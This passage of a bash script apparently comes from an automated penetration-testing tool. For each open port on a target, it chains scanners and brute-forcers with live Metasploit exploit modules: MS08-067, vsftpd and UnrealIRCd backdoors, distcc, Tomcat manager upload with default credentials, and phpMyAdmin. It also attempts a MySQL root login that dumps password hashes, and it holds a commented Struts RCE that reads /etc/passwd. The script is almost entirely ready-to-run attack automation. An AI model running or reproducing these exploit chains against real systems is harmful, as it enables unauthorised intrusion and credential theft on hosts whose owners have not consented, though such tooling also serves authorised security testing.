--=[Checking HTTP methods on $TARGET...$RESET $OKORANGE" curl -s --insecure -I -X OPTIONS http://$TARGET | grep Allow | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE" curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE" curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE" curl -s --insecure -I http://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE" curl -s --insecure -I http://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE" curl -s --insecure http://$TARGET/crossdomain.xml | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE" curl -s --insecure http://$TARGET/clientaccesspolicy.xml | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE" curl -s --insecure -I http://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE" curl -s --insecure http://$TARGET/robots.txt | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE" curl -s --insecure http://$TARGET/sitemap.xml | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE" curl -s --insecure -I http://$TARGET | egrep -i "Cookie:" | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE" curl -s --insecure http://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10 curl -s --insecure http://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10 echo "" echo -e "$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET" nikto -h http://$TARGET echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port80.jpg" cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg if [ "$MODE" = "web" ]; then echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET" nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET" dirb http://$TARGET echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET" wpscan --url http://$TARGET --batch echo "" wpscan --url http://$TARGET/wordpress/ --batch echo "" echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET" python $CMSMAP -t http://$TARGET echo "" python $CMSMAP -t http://$TARGET/wordpress/ echo "" echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET" uniscan -u http://$TARGET -qweds echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET" sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET" msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET" python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 fi if [ $SCAN_TYPE == "DOMAIN" ]; then echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------- -- +$RESET" goohak $TARGET > /dev/null echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET" php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt rm -Rf output/ cookie.txt exploits.conf GHDB="1" fi fi if [ -z "$port_110" ]; then echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET" nmap -A -sV -T5 --script=pop* -p 110 $TARGET fi if [ -z "$port_111" ]; then echo -e "$OKRED + -- --=[Port 111 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 111 opened... running tests...$RESET" showmount -a $TARGET showmount -d $TARGET showmount -e $TARGET fi if [ -z "$port_135" ]; then echo -e "$OKRED + -- --=[Port 135 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 135 opened... running tests...$RESET" rpcinfo -p $TARGET nmap -A -p 135 -T5 --script=rpc* $TARGET fi if [ -z "$port_139" ]; then echo -e "$OKRED + -- --=[Port 139 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 139 opened... running tests...$RESET" SMB="1" echo -e "$OKGREEN + -- ----------------------------=[Running SMB Enumeration]=----------------- -- +$RESET" enum4linux $TARGET python $SAMRDUMP $TARGET nbtscan $TARGET nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;" fi if [ -z "$port_161" ]; then echo -e "$OKRED + -- --=[Port 161 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 161 opened... running tests...$RESET" for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done; nmap -sU -p 161 --script=snmp* $TARGET fi if [ -z "$port_162" ]; then echo -e "$OKRED + -- --=[Port 162 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET" for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done; nmap -A -p 162 --script=snmp* $TARGET fi if [ -z "$port_389" ]; then echo -e "$OKRED + -- --=[Port 389 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 389 opened... running tests...$RESET" nmap -A -p 389 -T5 --script=ldap* $TARGET fi if [ -z "$port_443" ]; then echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" wafw00f https://$TARGET echo "" echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" whatweb https://$TARGET echo "" echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET" sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET sslscan --no-failed $TARGET testssl $TARGET echo "" cd $PLUGINS_DIR/MassBleed ./massbleed $TARGET port 443 cd $INSTALL_DIR echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET" echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE" curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE" curl -s --insecure -I https://$TARGET | egrep -i 'X-Frame' | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE" curl -s --insecure -I https://$TARGET | egrep -i 'X-XSS' | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE" curl -s --insecure -I -X OPTIONS https://$TARGET | grep Allow echo "" echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE" curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE echo "" echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE" curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE" curl -s --insecure -I https://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE" curl -s --insecure -I https://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE" curl -s --insecure https://$TARGET/crossdomain.xml | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE" curl -s --insecure https://$TARGET/clientaccesspolicy.xml | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE" curl -s --insecure -I https://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE" curl -s --insecure https://$TARGET/robots.txt | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE" curl -s --insecure https://$TARGET/sitemap.xml | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE" curl -s --insecure -I https://$TARGET | egrep -i "Cookie:" | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE" curl -s --insecure https://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10 curl -s --insecure https://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10 echo "" echo -e "$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET" nikto -h https://$TARGET echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg" if [ "$MODE" = "web" ]; then echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET" nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET" dirb https://$TARGET echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET" wpscan --url https://$TARGET --batch echo "" wpscan --url https://$TARGET/wordpress/ --batch echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET" python $CMSMAP -t https://$TARGET echo "" python $CMSMAP -t https://$TARGET/wordpress/ echo "" echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET" uniscan -u https://$TARGET -qweds echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET" sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET" msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;" echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET" python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl fi if [ $SCAN_TYPE == "DOMAIN" ]; then if [ -z $GHDB ]; then echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +$RESET" goohak $TARGET > /dev/null echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET" php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt rm -Rf output/ cookie.txt exploits.conf fi fi fi if [ -z "$port_445" ]; then echo -e "$OKRED + -- --=[Port 445 closed... skipping.$RESET" elif [ $SMB = "1" ]; then echo -e "$OKRED + -- --=[Port 445 scanned... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 445 opened... running tests...$RESET" enum4linux $TARGET python $SAMRDUMP $TARGET nbtscan $TARGET nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;" fi if [ -z "$port_512" ]; then echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 512 opened... running tests...$RESET" nmap -A -sV -T5 -p 512 --script=rexec* $TARGET fi if [ -z "$port_513" ] then echo -e "$OKRED + -- --=[Port 513 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 513 opened... running tests...$RESET" nmap -A -sV -T5 -p 513 --script=rlogin* $TARGET fi if [ -z "$port_514" ]; then echo -e "$OKRED + -- --=[Port 514 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 514 opened... running tests...$RESET" amap $TARGET 514 -A fi if [ -z "$port_1433" ]; then echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET" nmap -A -sV -T5 --script=mssql* -p 1433 $TARGET fi if [ -z "$port_2049" ]; then echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET" nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET rpcinfo -p $TARGET showmount -e $TARGET smbclient -L $TARGET -U " "%" " fi if [ -z "$port_2121" ]; then echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET" nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;" fi if [ -z "$port_3306" ]; then echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET" nmap -A -sV --script=mysql* -p 3306 $TARGET mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;' fi if [ -z "$port_3310" ]; then echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET" nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET fi if [ -z "$port_3128" ]; then echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET" nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET fi if [ -z "$port_3389" ]; then echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET" nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET rdesktop $TARGET & fi if [ -z "$port_3632" ]; then echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET" nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;" fi if [ -z "$port_5432" ]; then echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET" nmap -A -sV --script=pgsql-brute -p 5432 $TARGET fi if [ -z "$port_5800" ]; then echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET" nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET fi if [ -z "$port_5900" ]; then echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET" nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET fi if [ -z "$port_6000" ]; then echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET" nmap -A -sV -T5 --script=x11* -p 6000 $TARGET fi if [ -z "$port_6667" ]; then echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET" nmap -A -sV -T5 --script=irc* -p 6667 $TARGET msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" fi if [ -z "$port_8000" ]; then echo -e "$OKRED + -- --=[Port 8000 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 8000 opened... running tests...$RESET" wafw00f http://$TARGET:8000 echo "" whatweb http://$TARGET:8000 echo "" xsstracer $TARGET 8000 cd .. nikto -h http://$TARGET:8000 cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg fi if [ -z "$port_8100" ]; then echo -e "$OKRED + -- --=[Port 8100 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 8100 opened... running tests...$RESET" wafw00f http://$TARGET:8100 echo "" whatweb http://$TARGET:8100 echo "" xsstracer $TARGET 8100 sslscan --no-failed $TARGET:8100 cd $PLUGINS_DIR/MassBleed ./massbleed $TARGET port 8100 cd $INSTALL_DIR nikto -h http://$TARGET:8100 cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg fi if [ -z "$port_8080" ]; then echo -e "$OKRED + -- --=[Port 8080 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 8080 opened... running tests...$RESET" wafw00f http://$TARGET:8080 echo "" whatweb http://$TARGET:8080 echo "" xsstracer $TARGET 8080 sslscan --no-failed $TARGET:8080 cd $PLUGINS_DIR/MassBleed ./massbleed $TARGET port 8080 cd $INSTALL_DIR nikto -h http://$TARGET:8080 cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg nmap -A -p 8080 -T5 --script=*proxy* $TARGET msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;" # EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT # msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;" fi if [ -z "$port_8180" ]; then echo -e "$OKRED + -- --=[Port 8180 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 8180 opened... running tests...$RESET" wafw00f http://$TARGET:8180 echo "" whatweb http://$TARGET:8180 echo "" xsstracer $TARGET 8180 sslscan --no-failed $TARGET:8180 sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8180 cd $PLUGINS_DIR/MassBleed ./massbleed $TARGET port 8180 cd $INSTALL_DIR nikto -h http://$TARGET:8180 cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg nmap -p 8180 -T5 --script=*proxy* $TARGET echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET" msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;" fi if [ -z "$port_8443" ]; then echo -e "$OKRED + -- --=[Port 8443 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 8443 opened... running tests...$RESET" wafw00f http://$TARGET:8443 echo "" whatweb http://$TARGET:8443 echo "" xsstracer $TARGET 8443 sslscan --no-failed $TARGET:8443 sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8443 cd $PLUGINS_DIR/MassBleed ./massbleed $TARGET port 8443 cd $INSTALL_DIR nikto -h https://$TARGET:8443 cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg nmap -A -p 8443 -T5 --script=*proxy* $TARGET fi if [ -z "$port_8888" ]; then echo -e "$OKRED + -- --=[Port 8888 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 8888 opened... running tests...$RESET" wafw00f http://$TARGET:8888 echo "" whatweb http://$TARGET:8888 echo "" xsstracer $TARGET 8888 nikto -h http://$TARGET:8888 cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg fi if [ -z "$port_10000" ]; then echo -e "$OKRED + -- --=[Port 10000 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 10000 opened... running tests...$RESET" echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET" msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" fi if [ -z "$port_49152" ]; then echo -e "$OKRED + -- --=[Port 49152 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 49152 opened... running tests...$RESET" $SUPER_MICRO_SCAN $TARGET fi echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET" cd $PLUGINS_DIR/yasuo ruby yasuo.rb -r $TARGET -b all cd $SNIPER_DIR if [ "$AUTOBRUTE" = "0" ]; then echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET" else echo -e "$OKGREEN + -- ----------------------------=[Running Brute Force]=--------------------- -- +$RESET" brutex $TARGET cd $INSTALL_DIR rm -f hydra.restore rm -f scan.log echo "" fi loot echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET" exit 0